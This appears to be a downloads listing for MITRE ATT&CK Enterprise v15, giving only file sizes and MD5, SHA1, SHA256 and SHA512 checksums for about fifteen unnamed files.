MITRE ATT&CK Enterprise v15
Downloads
Filesize: 36KB
MD5: b30d3becc8731792523d599d949e63f5
SHA1: 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256: b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512: 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Filesize: 56KB
MD5: 752a1f26b18748311b691c7d8fc20633
SHA1: c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256: 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512: a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Filesize: 16KB
MD5: d9978a7bc703072527518ec65490fabb
SHA1: 4cfc423812a29a857dd4d7db38bb648be228df30
SHA256: edfc6d7d35c07e5cd1f9fa65b8c4861adaa39ef7091fe14c51b87a1d4932e5e5
SHA512: c3f248557d1c35f1d7ec5a96fbf784e52110fecaefcb82001426b996b58e43154e57c37484b3be974efac8e7b494d69a755808910af3e10fd82edc15a0ee6222

Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 1KB
MD5: c3941d9fa38f1717d5cecd7a2ca71667
SHA1: 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256: f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512: 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

Filesize: 18KB
MD5: 569124b0982577268dcbc9070e76fea0
SHA1: 149910730a6bc3a691d8df4dafb3cc12fd625496
SHA256: b3f8175d4f6cb09f6d2f912e1bf6d31caeaa5aa16abb84831051c883f16e7ec1
SHA512: fb34ef6fc5f61a16112e1fb1223f07a9d309e7871638d8792435e56ca4a8201b953d51047d264505bdd420898602d96419380f0ad0b68ae474c0b4a583ffaf95

Filesize: 944B
MD5: 9b80cd7a712469a4c45fec564313d9eb
SHA1: 6125c01bc10d204ca36ad1110afe714678655f2d
SHA256: 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512: ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Filesize: 234B
MD5: ae0f7fab163139c661e576fe0af08651
SHA1: 7545ab94360fd93f2209021b4cecabb92592be27
SHA256: 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512: a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 86KB
MD5: f3ed43acd7d035e8c6035c7d65ec60bf
SHA1: 679c01b051cbd42b740a05f0cd2807b16bae5aec
SHA256: 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef
SHA512: fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5

Filesize: 19KB
MD5: ac6f4727f46bff3bd3f71550ae96c15f
SHA1: 5966b42c1989bf6886c887a29480bd8a249476ee
SHA256: 580b5d3ab9575c944f5f15f42fe82a5024411a68f759ee7137e0403ac2b568e0
SHA512: 734a98dd5dad4674bd56b6138a94580be819c77ec3945901053b6c9f9a8bd34f4975f3a71b363ca257bfe0187cebe52bbb65fc262cb59f923396f5c2cebe737a

Filesize: 56KB
MD5: 0abd42634db4f4fb3bbbcaa066413d68
SHA1: 074f62ae3b24d775f09e98e81e857e6f1be05f3b
SHA256: a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4
SHA512: 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2

Filesize: 54KB
MD5: d9c253eaa73b4a33b91def3e863d644e
SHA1: 626c26f275e691183fa48b68daf586e24960cc3e
SHA256: 45474eaa30615f25da4e0f31447222de844cfea4375eaff3a6d9adf19101e654
SHA512: 5041ca9cce11cc44a11525eac5944a5fd21652b53794f4c2eb656f33d7d2e8cf2bd7ee25304a829578e57869b77d36c624059108ab8f018ef85ab673efc391c7

Filesize: 6KB
MD5: 220f7a6283256dfda65a5879cb7d8afc
SHA1: b640bc6f963b8cdc8104fb8f99ca7b3a34a510b0
SHA256: bac0966abfbc560de0f8802564fc5bc95e8492f838b394404641183a27c30b37
SHA512: e7e88895d26431f84c71b69c27b2549f7ecc5b2e473c3dc3c4f3bf52439d98d6e01e3640d142b8d0fe0a3e9da1b1efcd8b6a3233d86848ad53787e6c73014f89